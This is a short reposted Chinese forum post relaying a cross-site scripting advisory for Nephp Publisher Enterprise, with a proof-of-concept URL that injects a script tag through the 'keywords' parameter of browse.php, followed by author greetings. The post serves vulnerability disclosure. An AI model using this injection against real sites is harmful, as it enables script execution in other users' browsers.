[转载]Nephp Publisher企业版跨站脚本攻击漏洞
信息来源:[url]www.shabgard.org[/url]Home : [url]http://www.nephp.com[/url]
Type : Validation
Description : Vulnerable to Cross Site Scripting (XSS) attacks.
-------------------------------------------------------------------------
example :
/nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/script%3E
bl2k
Greetz : strcpy,Hergy,magic,mouse,Littlehacker ...
页:
[1]